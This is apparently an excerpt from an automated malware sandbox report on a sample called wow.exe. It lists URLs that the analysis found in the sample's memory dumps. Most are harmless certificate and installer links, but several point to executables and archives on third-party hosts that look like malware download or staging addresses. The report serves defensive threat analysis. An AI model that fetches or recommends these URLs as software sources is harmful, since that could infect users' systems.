                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nerve.untergrund.net/releases/zorke_release/zorke_asciiverter_v1.00/zke-ascv.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nerve.untergrund.net/releases/zorke_release/zorke_nfo_file_viewer_v1.00/zke-nfoview.exe
                            Source: wow.exe, 00000009.00000003.2995618572.000001D42CFA3000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3003856773.000001D42CFFC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2995364434.000001D42D116000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2881413074.000001D42D113000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2449407560.000001D42D03B000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2396830820.000001D42C290000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2999745341.000001D42D095000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2534388518.000001D42C290000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2999745341.000001D42D135000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2617938568.000001D42D04F000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2881814551.000001D42D0B6000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2881627835.000001D42CF10000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3008642363.000001D42D135000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2881413074.000001D42D06F000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2449407560.000001D42D113000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2602452812.000001D42CF10000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2995252451.000001D42CF4B000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2988521736.000001D42D113000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3006482554.000001D42D331000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2617938568.000001D42D113000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3003275215.000001D42CFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                            Source: wow.exe, 00000009.00000003.2540988639.000001D42C340000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2377176921.000001D42C340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.apple.com/ocsp03-wwdrg3010
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2185661471.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E1F000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2185661471.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E1F000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2185661471.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2185661471.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2368311174.000001D42C341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://p3.zbjimg.com/task/2009-06/06/98428/07c9mfhe.zip
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://p3.zbjimg.com/task/2009-06/29/106045/5fg9yjwr.rar
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://p3.zbjimg.com/task/2009-06/29/106045/a9to40e7.rar
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://p3.zbjimg.com/task/2009-06/29/106045/e6i8pdc0.rar
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://p3.zbjimg.com/task/2009-06/29/106045/rc1veeex.rar
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://p3.zbjimg.com/task/2009-06/29/106045/zwy1q6k0.rar
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://p3.zbjimg.com/task/2009-07/28/117228/4wtjdjio.rar
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://p6.zbjimg.com/task/2010-12/03/519808/4cf8bc6362f34.rar
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://protechasia.com/cliopmq/cluton.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reifenquick.de/Scripts/hl8-8w4cs-6325/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reifenquick.de/Scripts/statement/ul397wfyb/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://server.toeicswt.co.kr/svr_netchecker/server.asp?V_COMMAND=3002&V_PROGNAME=SJPTManagerLauncher
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://soft.110route.com/PAETools.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softdl.360tpcdn.com/inst77player/inst77player_1.0.0.1.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://src1.minibai.com/uploads/thirdupload/5d3e8177e87cc.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static.3001.net/upload/20140812/14078161556897.rar
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travelwithmanta.co.za/r6x7x6rf.zip
                            Source: wow.exe, 00000000.00000003.2187683453.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
                            Source: wow.exe, 00000000.00000003.2187683453.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187683453.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188080706.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2185661471.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                            Source: wow.exe, 00000009.00000003.3005764758.000001D42D391000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2396830820.000001D42C290000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2534388518.000001D42C290000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3006482554.000001D42D3A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                            Source: wow.exe, 00000009.00000003.3005764758.000001D42D391000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2396830820.000001D42C290000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2534388518.000001D42C290000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3006482554.000001D42D3A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.opolis.io/Opolis.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reifenquick.de/Scripts/FILE/21mnqlvi/oz88535657v7rbazasyth9x8i/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reifenquick.de/Scripts/closed_957176_mxqSdoJ6a4IZ/close_warehouse/ql55hnq09iyn6lm_334stxv
